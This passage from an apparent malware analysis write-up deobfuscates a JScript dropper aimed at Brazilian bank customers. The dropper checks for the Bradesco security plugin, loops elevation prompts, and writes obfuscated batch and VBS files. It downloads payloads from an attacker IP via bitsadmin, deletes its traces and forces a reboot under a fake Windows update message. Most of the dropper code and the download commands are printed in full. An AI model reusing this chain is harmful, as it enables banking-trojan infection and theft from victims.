R9cs39N4.WriteLine("::xVfwjNru4MHN34e4tLb6MZFduX309Orq04X8cXAeh0X8wgd2Ok3q2tr1MgZ9lflvm4uRgiZq5aUb6gnHZ14AA935MZm391QSk3J8i156nT6rZJP1ce0IcqPUJMEuJPh641lDQmQ6466mYK620UeqBT2qbIJ5vN5OyqFkTLDycT5Aig20264OQ0kIjDkmo4szq7Z4aObYuNxEg8MQEqrEaIfT60S255h0v6rhPTt0BH5r31lWmGw34cxIXTuInk3J3evF878kforqldq6fGbierGpVc83uJn5djUqb1qqtFB7j0En16olGRmuzaHdrbQbj37ST4in9mTpju4idF16rlgSX9qfj2h9w2aKwKZCJ090Fh179tfIlLXO4XAw0nm0KY8Gx2oWA8iIDXDtqRqHU09Y8sTYz3101LVRmtmNj9230LSbzNYpAi8ns4EH4o972sgsTV17bRtzV07A4qGnNuGNzGGGwQFjbCJ6R0F7kxkGCF7eLRlk4S6N3r42BEa1p71VI4H4o751v8jgbuX125dVcBTzJb6dZRHE9VJx98l6uZH0PKigBANklppmTRn5hUZR6Bd5if691qBJXk9TvLmdlWjKpJF5Lvc9XmS35wYxERrB9YLX1C9dxSSm3zzXxmLc0BkEf33cfm2djkqtOYlQ8rWk7LWxUG26N6EcB7aV58XRrLUW7aW2785yKKH34NRLvr1Fe3ttZSy5uZTg8Rj0eC9JOOunayE4825H0pY7AH25ngxfs4peVusmySrLxlz2iXYcCSe23P61ZGiLEROwaMB6nz73f3YIBRcXbWbVsvlvMYoXLf0yULB3OfVz3pwS4V8eCmhbV5W6xWeyRxi8asPC669mL2lGWdSv80Ay6Ikjjx03U54n4Jl7qoH4lHOM1C0ph2Z9C86lF2z59Efp4w6ol8kOevA9G0N44ReD08pL3j0S12FQ68j6oz54Vy8KEOo19DznbE4Xe6vZC8XoM42vCA9SMxqDO1i3c67QybxaSA4MA1mae4575uBbUS5tmlXhu6Eh72NXH30ll98BGlLQ7p6QApmhBTPbEthf99i1qF9FdTD1gKeEOFmvE3UhKmhLugH01tKS7k03j1MQ86gJopgQGRwNuvk5jS26037s8r9btSLv6HmHRgWheyTUpwZ942LAqkUtXdTue1ZL0M8H57ZZ4oIPLB56VwTf8aKBX11T466haKMcy12hZw9xABQa1U9I5KRRspE0065WUdwJw7SE30NNxCFJqapGyt5j446pe0Cy86jGEL0kwo9G6bf4CpsrunsVM8770gVR7QZkRS7Ok8h3IDtLRTYd0H7zaA4oPoiAPl0uzk3l25pGtl9B2Z5RpqvRjPGcn2ou47Oi7498AQ5ldoos9gNn2GiflaC2w5y6WCuCKR5C9iLWPF4taeHbH6Gs9ZNe3V2xGMUekyH7lp990505vAsSWbZvSDNkD6l5LWALCdl43Ho2Sm5REoot260xXWy63z836t6GmyqyYzOh5xlhjWUl4bHOm5sDgb981WLIM6K8BoDO9BmxC3c1KHiA7QoDouH6JtyTH8U1k4YxxMb3y92zEt6t1ATZ18n89Ecx5AlJ0K6zIxhiyg60vni2X7YjEn9Z6bRCtpIE0YZijMVzu1Nz32vvyKQ8urDg0K36jxf2lY2pF9Do8L1j0PVosXvbmQwuZGzSnvteF4aSP8iPp6d4uuE40dnaV3iTvao5AQ25dqjX6J8fgjS46XO6gjmvjdVnsMTx9XKtytSAjwLVFwbCHH6OpiV42CctZT4t07I06yBnSd2P058Z0pPGm6RBi9SPIft8Z050bWWvw");


R9cs39N4.WriteLine('DEL "' + eUKbZgnryU + '"');

R9cs39N4.WriteLine("::QSv73TH4MW6VeJq2aQyouLMm1M6uhY2hId2K5W992fD3ZJNjMi2L4x8ftAU3ZreY8PZa284UR0kWbjCccROEvRiQna558td658IQ38IuFV3AR40HllzFPVMnzc88zsPWfW4QbypO6MxqtJKpohmnn8ZmU7ETMj0h7CDET2H646ch0QCAg8aAbigWgpn0ow38b80OMKwY4J2GO8BCBF37x42TVUraktGdqK4OMKz8Ywf3eMyJU3BqGBzp94y9UCcOB56z5whdZhM88Iobz79HP970t8ke89yY5nZCyeFSc1xf9SEade66Jt5YQHVcXKUsLaXCAmy89W6zSneniJ3WKp5z7Lkz1Ivz42jj6QzUA5RQkHsS4Bu7UrV5gUoB2C9NycnOp8UBFp6ovXq30QB2Rwo3r19iS5I8UJ7Y11TDuUEcLM7oPx1xnHam5bV8J5MxIrS07kHmW5tAWieRBv5EQK757bJ4622hxWWO2EcUjK1kvi567NSQju2yQ7M3yt4ZE81NMYQZ72T8V51tCHqjZm68aM9iO3Iw34Y936H3MLDM4oQyxa45J3jdBNHzRGP9zjNQ95U4ydK8Mo2620854H8j43CbFJzO6bUOSnYVmgRVDN0YYZYXPG47arj7OTHA9MUIeYta0h7a1OJl4nyEq7S9mZFe1JuWKWUVZVmo9i9SAObVlrSM5MJzif5nLPy82bRZxNJhBw1hqqpsIllc4lFb803fTt7WJcbfMF2b5K70JXdNmG05KyM0UyfNY4ofi36513vRrVO5S9o8ZzV77fj299mJR75qKq3H9X93Q9fOCkm9Z4o0z35FR005SjZd");


R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\h4zL4J4Nf6.jpg"');

R9cs39N4.WriteLine("::lIMiWJJu46U9At4pfFQAmgHCistJA8C915FNNswPbse7tBkk8RAb2RLn71stov68i4He5HvI04kXOPfoCfej4Wg6EuE9218Lkzj8sk9UBWYK6xND5R91ITkdhr4r6r1EENM98CvSo60790uuCrhKV2g7xybCFJljU2GgmEP5k1wJXE403CHWO4XXp8nJ4xJQ4mv4AKOcgMGlqs6Cz9cbYSXwjqTgEFMp7p4uL29722yLbK4fgSmyzONTlqm5uiJGfDqnhskn72XcoYLsb4Pb45ei8GQaq4yTLI5nsGIyDK3l6bJ0A9CnYkC07NkH0Fb6nn8HRg1xGVQBIcMkm0KLqQkYE1y1uYIz7GnXDX4I0VQniXuvx4GnlKD9oz48KhOS4yAbHZWDjO5esxx4escyQwf4bxoJQC5Vh26N8L68jGiqPjFsU5VKtS34lYwdttZyqOtLNz2FW4FXCWjV5RAv6xwQsY3252RXwEmo9Z5bGgBTF2c9CP5Av39G0vrxtP9sPJo94pl6B485p214OnIy3S0vJeNnec32w4GokxN63ec4GE0571O56QI7cj2Y6uKD83Cmzw0Z8MCdlABrekhsm7xmaw6BlfMbOzQ759Y8mT3tp11P8D8bZa5uSaOI91JwqeESzGi4Eofv914Z5zCQvTx28TQsyOMzNXxpdqQRV5Yfe7d1Nu214D8OU9XO96K5YR6aoBP3FFSQkbcXH85l2024RvM0Ms82Ibx9w38syMXN7j6BynohES9kcUX301mkpfbDsAaUd19GvKRUO4PPY9OeBM9DeQh7TNKzxo");

R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\n2x8Fb8oeJ.zip"');

R9cs39N4.WriteLine("::sYe3rm79VcNbgCKg7arIr78halQajc34BLQNDxK38FFQ90HAh6ZfbZ8b4kjuaaZUft4D8645wZQcTtO3WQPA05I9QIdzyjW0CTUJtTGadvKPO5bH3Mco064PmsjbWbo7OOe9Xg5FED7m1880kX5SFfb8mCw1f1R4dAevQhPfWklFd3CLLqY1Xv6J8SVeiDf7SYobBIa1pQvapQevs0y3o8L5uo2PU9E6bsaA0h5W7fYbtKvF3le0J697qDlxAQDUmiZ0RXwJ9W1bc1EzQl8j8E4OT8T3Ux21h3MXSiwRLrMXvK7DZR7Jw5S3kJ88p0474NVA4zpnT2M6qok6OeX6CDtLhbgGnvstG83Of3L9o1SkCWbKS6FNgsozG0mSgK4ay4txrFbg9XRX6SCEkVod7zKC480mMwv3za2v3xJR1pUl20uY9lR099373LluPilFEd8h4hB5vVX4KVLZ4Xf0FhUj1lDG074I9jl68OfYogc40XcF7Dw29CH8Y4Hmq9GHaFmAGLX22JJRIophW0QE62BwNaHyUtj6jTx55hU13292ebsfuU8ry60250PrOyYQ97L4cXY66uG163o4ffr2WGmogZigyi8Kz5iG1Ve0E56bjVOEXmu7b1T00rK8o9JG92t1VvO4SW62sSzoDnU3DSZ6VYu73y13ll26ri5CyJWWu5xNvtMizt8sbOffVt0iWpl1kOvc1BP9XxO08Fy3jdqaZhTeVIS2L8s34j0zlsOkE5cGxajjcqaEAE2xvoEs8WZ7dEo2d41n92Q1MVTCyoB0CH10Ot60Z7WeKqPdRzovLs48J4w9qfZ6aMiM2phYtYxS7VIi5SFelufdR30lr1K9lqjRKa37lrMaww6NhrO3tBGERp2AtejvW0ooxXV4XaGUsC1km9uWlJLyLF73W2GmxwN3iPhRZ1mtArr6Eh1nQ2nWRlLG6vjiQ00lks8RAU2cn5sL5Fnh61X4waeg1aW8Wx6BfRB46qWHqwdLGtV8DxNYWsrbx7BVQCyS3f61awe4SWPf8HU1K3tWry8416Fxus4iWdYf7ap4Jy119z4BPFbu0usL152T3m6WJM8zqQY2VxBZjld0vI33T8tkraJcc98Y2u4Hhq09tzef4Z75zfT2mr23703Nlby06ontqctaT2xc7yB00K8f5aP9jD57WelSTEOYThgMp3kqu8IejsXk2c2GcH121x4VOKz3YadMObUM1tmss95NC2p3cSdZmd9hq0LcFZ3sFPDrOo8nD0Vm613FQj9Y509ULOjt0IURhAM8i4B1SynjtCT5Op6TFV56ybaLVjwcYB4HEeljecLP06pDPsX1599ufJ8sEaJ2639pJwtr1gV6D3X8V4CD41RAhiVf48yBDFPsSx71fwDnLg8IzeJ4PqxtY2M90CTUd5uxsX66W9d3maQH46zKR9n3xC5cAvrM1vaNPBhf8raCU6F77qHEEtn1Xxjp72ao5wQ9j24I4MtT2K4bc71crj0jso77VNEdDxbpga8B3i5a102n4f664hJNFEsWhfk5dEIjj07mUOstzlqm4e6AH5uEOo394ZFaJ3Ewl3HPVokx0tt7675ok57E0JMPNthmazYoslFZHh3pfj4S7qc6CU3VVA1");

R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\kdbJe8gRfp.zip"');

R9cs39N4.WriteLine("::YGe8Z8fwiCnevcM53D9j4G6IxR5Fd036EYhIwWIiLf0iw4xz99De154lvTrwCmkxKX861FJd2zS2554C7ZknZ7OZ1i0r53on8H3yLjLG27AA7P9pOI5544M8oKDURwV53SyNrbToWJ92SzgaTN36tD4yihZnXoxSri1R2IWXnI29baa0f14EeJSY0iQ23argBykG6ci34xouXFq3kCpapW4r7ihQ6JyXXjsTZ0iJ6s56duK41W3YhLmEtvcyK8H7HgO96oq5nOlqWu4OVnX49e30Ed34eKsKhCPAti8A8A0PGCovp0N8Uyg7mW70jgMZtZIWQNO72QYNchZfWxKbPD49Iov78pV4f79LavRYH4P39Ez3Su7iGyQoqF2KG3Q7gvoC6q5nG8YrQ3SCgmBIG8AHI5ZM7ArQ7E27TRa5IvlIL8lh3FmuSF28A3D9epFkU2dUJjKTsWsIIw7z86gIH2RemhR2yPeMaV0OFiUi4rY6sAyO7D6tOD4jKwhjttLhwq7xUV2NR8PfwvGxwaGJQupS9GfxTe9MqWIo1BWk34X6q7619zOy18OeRELpyBgctRG4IhMq8xWC73a6vM2xzjPe5hkwGDeE2exeL16pKS1k4Bmu5dZZDmrYkWp407H37si3bQ7HgE0NLDSOo5WiabdufpywTOmnHTlcnCTCmI88KSi6G96lw0BcVF0VwPkOBZBoT36FUOq3Pz2rWbQ5Viw070Sy8x2NTQde29R44b131YfAhkQupRTY3GWfm945rZBhjk7R5i7V1Bxmecp179281ta25xn6v9OPXmG3tbP6y6wR602aZbE7If1HSlO6LJrESENX4P4UvbPseFRHmuhMTivdykaIxHTPBHrQFPhP9lq4ppVa4nV86g4PBSREYjYFQScJL28MF0Qkb55I90PPxzOaPsJ23ECarOSV2eVhpIhfDTYZ6QxQjTW3TeGi1NWGdoG3AZd3miA5togZ1E5sL3bFHbx75KwfD0R3tXvoOEb5GrdRGE80tCYLokf2gb7xG10pyh563l7D7kAU5pQs66jc5IbTeYtS5SXlJIGZIv2RmlD6IgklBEm51vviomtKveEbnLOWiX725cRBnxlk3yMh697A3dOvB5L3L4cRyVA7Fzc1ImZDWxMcY28nPGj7AUAD3IC6X6K76cS4mQa230AUiGjR0PzTnqJtoSbOaNWsUeX42ACfXLkuC6l24X8MPbNR2xp3B4bF6K4v2jzDno17ayu3NMeqPGvmhoAsav0Tm36JlI3IQ65TwAhYHe5exBLCyQO5091a8s9lq774lEzWFWppbgzQ9fMABtzJ36yTRaN9yhtwN048RCKp5WBEFxjJh8BTZwvDiKj2DHnseHu4444q807Wk5QFZhLcJZ5bKrgW608pwva8jb4N2y88kfRj9Z3CPz2231H69UW9rSAQ93MtLniGf");


R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\U34B2X0Cwk5dk2lfzCJ.zip"');

R9cs39N4.WriteLine("::zxq52kh8yK32XrdSajrBgRV9426ggO1D2G5Q0v4WAKxommQPw9Ko6P4z53lbO29bX21qZ2ZOuoHx1Ey5cQ0w9D6mwMniPjgxrEH1W2LGSaR6hWmM1v3qX8kxiYUqSXElnGe80EcO1BHjcIh7bdc6mBl49g0h70ug872McpNxO3n2OmukpyK26nYmXMaKStlEWH080kbBT3sab98AD1Ef7WfcF8JngezJtEJ59PcGvKN6fr42AxAQIa2oQVLGsRuIHyOZ3aL0ow445JZtJfRcgl4dL13pAfqprxtE8ayOjYr24V2mcUZ9AK4fLPeetp02CSY5uKmXYfF366F45H8xth170h3AX3dnuyA2tj31RqvxteB1n1pVcQmVCoVujklx4Lt61hQ2PyTGg2qOkee2omTmA0kJg561r02kixIujAdmVctSFSs6QVeLn3gEPvWdsrPr7PqI61h2UwvyVqA6xX9Er97FhgU2yf1ovwTsjY9rFNUaKWgA94cGCIdS652uK0n7BkY8zzd8HqMkNnGNBoepKtY6jSe5AUO98yR9tTbL9744611hkZiyQUkNTh25jiCeA47VW6TjcICPDYq2s3FHXrPvAL7548bYmG2woKK0yw1g8JP0Q3ASUId7Y0kY8a5DdvxLecbCTR7XH3Y4TnFEr2NoHA883vAt45OYeZ7xHmw82yv3Rf59AkgB5D0SJ4QpBczNS70Wnpz0NpTfe9w4iBvYhLU7UT7m48skn3JK81GSOUcMx38Cw8fltHFHyz55bJksDPHr1ca7KpGsnjct7xHmh681vgjjr3ovlX590BrL8fAi1qkar3KJE5Pu9J5zo50uKml062OCtiSZ1Uv55HOId4KBTy1UddW0hDvpczoq642U9Fk6K3EnjT63nZ7MSmnXauC82jORr4pOpm89ZOd7HtCtWUSbF9pYyQHrf6hJaY477cw9Rt8nH1YR0QG2S2eIV9bjsBIretvx8j8sLOn2Ia5fZnc3Th4sP3fF7GVIbL8v0M586WrS0UCqau92Advi41n6O61nkE3E40");


R9cs39N4.WriteLine('TIMEOUT 180 & Erase "%0" & shutdown -r -f -c "Atualizando Microsoft Windows Install."');

R9cs39N4.WriteLine("::aOxR0HM7PkMBbCyRc3LQDQ9iluj9L4Pz9yPCBv428dXcjJXY36kMHmq2iQ2CSy5iRskV37toxmw66DYkse97Sbpc8HXr1dXg8bH66990JXIr0hOT5R84lL0a0187WiMS7ju1NdK9w7rklJnV19ZguJjEgabb5XD2182UPXaqNIX5gEuOgIVfesGtxumb12i2c7bek36lOc478ZvM3F19nxHMP15R0yR7Uy335X0K8ZPaVnhL1Jr0PA8tFVzD0f8wsKCbKW8QWQ4a22eEl33519RyQVe9iamq2dkJqQ08oS71yBYpmQ5U8UuL4a5mEuSXmPUp16qI3Fjo56BIxWUOzvLzTX2P173QkA9vmNbBo0jbHsF5Hj46TVCa1k5esJS5bVcTi8kTC0qUrotw5813NzHoSu51gZF9JV387FoaZLnXXptJ7gGknm7WHMqbLvRM8MeMngb2H15AXy84B7AYuQWG1qIbGMwnU8SRCUq1SpS4Vj82WvUs6mNTXATZaQMRJIj4dTzB835e8tGcfFducZTmmcE99muYmwfZ5gfQ2F7AoNsuyahCHdL0yj9G7SF33aQIumEWKS2VGtr4J7bAHgpa6CU3X7553FC1ng2Z98fPxCEX5PRrH1iaLAvuZkG3dPqeHpr4fD7VUieGWrGY208dfw5C0xuIOOfibxbbZsmqWvuLCBfkgW65k9LVp9CdokH6cM5Xg6HVW8hf8go5fSWQsG7AuV21bDn5kdcd05u10EsQSLkFqNInJbg8I2RfokP95PIU61r3v1pD9P0W6QynPm4hX0mXf3G73ojBcP93tIsW02sn3zTA3Ub4sK8KgVlI34s75vULOJCOR21Xl4z4VMM38habOcldP866sSgqxRUBy54rshp24JlEz4GJZRUHDqrr3ltZ6ud0AKb2KkVjtg6bXO3Qv9l6SKM27egk0Lm8twLr5an99y8SGg6Euq33OPeWD6hqyJqT84rtxPZZFmp2cKPpc76n580apqm0HOEP8G78HJVwG73SMb8rxbOA0273IZA7Mv0VATGyWc5u6JIqUf33wSYS5ptMQjYLWqj4M201RdIuWnAXl7O2l9iyZ4S1Wwc53Nz84uRAJOwz3Dk250GlL1j3YpXvILQJgdHRC6CPh4Kp3759Z4NA9p9n9ZgC0LPU2TBj95CRH6rNqYg8pVi5Me71dMlJx472UWuu7QYW9BE1fptWH29i1QBv96589MDD48Rl8HAeFG8JF6hSPZpvslQjvNppURua36F241r9NFpINQbddP18vUTRYMSLUFF5vZ2aWz6FlKm4784dr9K4FGE9i7uq78gX2ELggtkRU63IN30tkd6eMTiNYSlpU963E629dMLA721n4Q9VFFYTiV41KN8qIf0t73UB0827F9epVX4uDT2fGhpZRlO7Th1GWevbG6jvyu1oe9BKWde224681oLO2fSihsJVbJkjb4FA5mG4kXAOWFSx8Nf9Qh7tgeidCp7928TmcWM9CCB0Nudg612Ivb2Xo0V9toWA6G5ocptbtHMPIotL8qHTV5Uh2H96K48RS1BG1ebH93JqBIaS2m18NMokQ4LK4Dx0M3yyY4j8ty3ffj3Gta3YB8yYyAsPa6o3vfSEWkAnWtK333IREyfqPMrS9atEH0jF8U7G841XI0uo99neYjNmN6I0q72jeJ0M33cD7UkaZVtxB0tMTtPfkQujw8mdlRsDuXdsQUrdYIfw8lCF40rVELN75Cjo6pmW9x5zAePA4525XRLNn7iu1AcOq4bw9DRFVte7j0Voh8cvC2C0iXZ7IQ2SjA6xwCIWfP6oBHNo5g642ARfbrlQ94PZmTgPvlMJT5cudCV93ces4jOq5mjbOw5qtP07FFzkIaRLM1X6N086lfLcQO4H487XpwPhMD0l2l2R3T0zF");

R9cs39N4.Close();

var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(eUKbZgnryU);

R9cs39N4.WriteLine('set qgvYsX = WScript.CreateObject("WScript.Shell")');


R9cs39N4.WriteLine('qgvYsX.Run "%comspec% /c ' + j5tq1MW730 + '", 0, false');

R9cs39N4.Close();

2-) Let's see the whole structure :

2-1) first part :

// creates the ActiveX objects : manipulation of files + run

var Nv3RU90Lt5ZG = new ActiveXObject("Scripting.FileSystemObject");
var j3Tezo2PL9ok = new ActiveXObject("wscript.shell");
// Folder that show if one of the security tools for banking is installed
var p4KBH5u64vNz = "gbplugin";

=> Folder if plugin for banking access is installed (Brazilian bank)
var go6xt1m8jIZKV = "scpbrad";

=> Folder if scpbradguard.exe, for banking access is installed (Brazilian bank)
=> Banco Bradesco S.A..
var lg9Ba493sIk = false;
var CYjK6el1 = false;

// Folders where to test the presence of "gbplugin" and "scpbrad"

L2jl14qQMb = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES(x86)%");

=> "C:\Program Files (x86)"
FKQRd91EjgEw8 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES%");
=> "C:\Program Files" or "C:\Program Files (x86)"
2-2) Tests of security tools for banking :

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb)) {

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb + "\\" + p4KBH5u64vNz))

=> "C:\Program Files (x86)\gbplugin"
=> security tool for Brazilian bank

{
lg9Ba493sIk = true;
}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))
{
=> "C:\Program Files\scpbrad"
=> security tool for : BANCO BRADESCO (Brazilian bank)
CYjK6el1 = true;
}

if (lg9Ba493sIk == false && CYjK6el1 == false)
{
WScript.Echo("Error Unknow");
WScript.Quit();
}
} else {

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + p4KBH5u64vNz))
{
=> "C:\Program Files\gbplugin" ?
lg9Ba493sIk = true;
}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))
{
=> "C:\Program Files\scpbrad" ?

CYjK6el1 = true;
}

if (lg9Ba493sIk == false && CYjK6el1 == false)
{
WScript.Echo("Error Unknow");
WScript.Quit();
}
}

The Script Quit if none of above banking security tools were found.

2-3) Test to see if the script wasrun with elevated permission :

MjldoqNZhAokOT3DA = j3Tezo2PL9ok.ExpandEnvironmentStrings("%SYSTEMROOT%") + "/e0HbvG3WG";

=> "C:\Windows\e0HbvG3W
=> if the script was run without arguments => test it was run with runas => elevated permission, by the presence of e0HbvG3WG file !
if (WScript.Arguments.Count() == 0) {

var Koz6CN1gH = new ActiveXObject("Shell.Application");

while (!Nv3RU90Lt5ZG.FileExists(MjldoqNZhAokOT3DA)) {

=> if "C:\Windows\e0HbvG3WG file doesn't exist => Loop

Koz6CN1gH.ShellExecute("wscript.exe", "\"" + WScript.ScriptFullName + "\"" + " /a4gyFwxb6St0QHv1n", "", "runas", 1);

=> script run again with argument : /a4gyFwxb6St0QHv1n
=> with elevated permission

WScript.Sleep(10000);
// wait 10 s
}
WScript.Sleep(20000);
//wait 20 s

j3Tezo2PL9ok.Run('%SYSTEMROOT%\\notepad.exe', 0, false);

=> Shell.run
=> "C:\Windows\notepade.exe"
=> open notepad and quit
WScript.Quit();
}

Here, we are sure that the script run with elevated permission

2-4) Creation of Folders and files :

try
{
Nv3RU90Lt5ZG.CreateFolder(j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps");

=> try to create :Temps
=> Example : C:\Users\DardiM\AppData\Local\Temps
} catch (zc2Gj6bZLhiem8)
{}

var z4cwrnc7 = Nv3RU90Lt5ZG.CreateTextFile(MjldoqNZhAokOT3DA, true);

=> creates "C:\Windows\e0HbvG3WG"
z4cwrnc7.Close();
IDxyPFq3XxAOsK4kEF = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\UQv5OyjGx1f.bat";

=> C:\Users\DardiM\AppData\Local\Temps\UQv5OyjGx1f.bat
j5tq1MW730 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\v5KT1ENIDUVo.bat";

=> C:\Users\DardiM\AppData\Local\Temps\v5KT1ENIDUVo.bat
eUKbZgnryU = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\ngx2uq.vbs";

=> C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs
Here, the script is ready to create 3 files and run one of them

- UQv5OyjGx1f.bat
- v5KT1ENIDUVo.bat
- ngx2uq.vbs​
2-4) Creation of files and run :
First file creation
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(IDxyPFq3XxAOsK4kEF);

=> C:\Users\DardiM\AppData\Local\Temps\UQv5OyjGx1f.bat
R9cs39N4.WriteLine("@echo off"); R9cs39N4.WriteLine("::dWwRQ3816S2HWCpe0JK9HqEUh3J1aX4U2Umf0kpQ2nlFi51pAmb3pEBUs0vvur9zCKV4o36CLVR0BFcKaArenAHKAuTLg8TF99nk5G1k0ZPIbxQP732uoPaFxG227h4Ph3o3x5I1qPaY0ZYU9xP0cxp8WZbI5F2f5It8wqmX58Cw0j1RqWu9FTh7Z3RNdl833eagobj6dpr1yL6QJSGMxDXcDKo4loscGsICLms1emXQUoBH8S3ZGt3dAz6gCbE0h2iQrAhGEVf0RqaL901Aro23lkA3vGdmZiffnMiSRtyAIxxUcd01DeXXd8p9zAu7eE7DbB3KrTK7J9U30QmEh73kOfTOczigUPqc16j3pDVz2GipC98q4ssSDa9U02CTU6cvwGqrOs94T89fahI8v6q3hwrDF8X85Y54ND4ZGz37isuRG95fKBmgcyG17pmUK2qy93fSH5Zv2eYvxdbzWlLfaFrHAzhUhxFFo9CuqLODHK8q02rOJo3dYzt7lmuiBY7wOlujYYv9lZ39x899cg1m1rgcUQo5LD5D7PzR579923c0A4poUcOTyRry7XdGy7FBicDkcpUPFHmOYrCIc3jUi5iOe2EXfR7G6fx2R8tQ99YCTD6n389F0YymkkwNiOZ0ALQfnsq5IwO0N5TMq4aNVhhNE9ajhbr7PkvlsjrLvJNvVE5Liu2z6Wd41dp6o9OvWEkHdT7MQ3q1pCS1QB2BU8zWuI2opY4cm7Rpa0NZCUHMhcYEiqhbcEXBH2sCTeLt9N4GXeZyUuA911ndN5IHGEs4bl4ZhLZ9E6Op077541PnPAEdL3755U9k7cW5M8VlCsvvoT1Yuq86sQyU9O4Zlo2cLp9bT264lR5Hy4P3Oh2Z5i3Y4vbWQdB8vVD969fbo5YqNeDFr1J91Pad7XBZDb3xom198urTUefzMb7Yapzz37VdtuN8qUONl7mzsTVaj9G1yB77Qx02rRuNJJL2beoerPnvBaGa6Q4eeD71Bz1LyT065EP4gPbj4dRR49CKNiXW5w7UsFg5tzJ26mdBBf63hFOyLmE9h4P2Mu0FpMwbRz75WshH8v3r04A5hG1uQUdzez9qq4oTqAXz08glnL9S0IBfdwyWyK1p2RYFmmuXXW1wN1Vk1h22aJ7HKbesm5gnDjp17x3uuaq2T85ZmA8v2XNzCz4yARjTL01Xy0oTYUL3NHbvo8y8k26xKVc0QTR7Sqvstu4242koZEw22jiS2Myfi9uix9LOrkGwp82kaFYRl0FWWduH3P25xb5DAoZH77Uy04S1yS1TX8m81ErXZc3X7s0gWPKHHnotCGWQ1aH31H46mqZuJc2w75fK854Fa08Za95BP8n2abOS7Z84yZqUK0XnQNgipcu2O17TDSJSf7U0tz91PoWAha4LR6");

R9cs39N4.WriteLine("TIMEOUT 5");

etc,...

All parts of the UQv5OyjGx1f.bat are written, but a lot of parts contains useless lines, only to obfuscate.

=> They all begin with "::" or "echo '"
I will show later the real content of all files, and with all the useless parts removed.
R9cs39N4.Close();

j3Tezo2PL9ok.Run('%comspec% /c ' + IDxyPFq3XxAOsK4kEF + ' bitsadmin schtasks cmd rundll32', 0, false);

=> run the UQv5OyjGx1f.bat with ' bitsadmin schtasks cmd rundll32' as parameter
var aspas = "'";

Second file creation

var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(j5tq1MW730);

=> v5KT1ENIDUVo.bat
R9cs39N4.WriteLine("@echo off");
...
R9cs39N4.WriteLine("bitsadmin /complete NZrk3biH7Y");
...
...
R9cs39N4.Close();

Third File creation:
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(eUKbZgnryU);

=> C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs
R9cs39N4.WriteLine('set qgvYsX = WScript.CreateObject("WScript.Shell")');

R9cs39N4.WriteLine('qgvYsX.Run "%comspec% /c ' + j5tq1MW730 + '", 0, false');

=> j5tq1MW730 : C:\Users\DardiM\AppData\Local\Temps\v5KT1ENIDUVo.bat
R9cs39N4.Close();
END OF THE SCRIPT
2-5 ) Explanations :

The .js file :

- creates UQv5OyjGx1f.bat

- runs UQv5OyjGx1f.bat with parameters : ' bitsadmin schtasks cmd rundll32'

- creates v5KT1ENIDUVo.bat

- creates ngx2uq.vbs

UQv5OyjGx1f.bat :

bitsadmin : %1 in the batch line

"BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress".

=> click here for details about BITSAdmin Tool (Windows)

This batch file is used to download the zip files and one dll file hidden on a .jpg extension.

Then :

%1.exe /SetNotifyCmdLine NZrk3biH7Y "%comspec%" "cmd /c cscript.exe C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs"
%1 /Resume NZrk3biH7Y
Erase "%0"
At the end, the batch file run ngx2uq.vbs that runs v5KT1ENIDUVo.bat

Look at the spoiler part !
@echo off
TIMEOUT 5
%1 /Reset
%1 /Create NZrk3biH7Y
%1 /SetNotifyFlags NZrk3biH7Y 1
%1 /SetMinRetryDelay NZrk3biH7Y 240
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/0/32/%RANDOM%/kTKDPtX/piMS7pp/%RANDOM%/zgQd/%RANDOM%/GD7x8/K49M8Sm7.ODI %LOCALAPPDATA%\Temps\kdbJe8gRfp.zip
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/0/64/%RANDOM%/WBwH/b1yWkJ/fLb3/inY89g5/%RANDOM%/%RANDOM%/xU6Qx/AwH0iooyj.FPz %LOCALAPPDATA%\Temps\kdbJe8gRfp.zip
)
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/1/32/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/nyXRj/r0A850g.uIc %LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/1/64/%RANDOM%...%/%RANDOM%/%RANDOM%/%RANDOM%/wRDk/xE8p8aF.Bew %LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip
)
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/2/32/%RANDOM%/IYAk4i/%RANDOM%/Pb9EK/R1fJ3z/UK7U/XmG6J78a.ZaP %LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/2/64/%RANDOM%...RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/vf5tTr.xVh %LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip
)
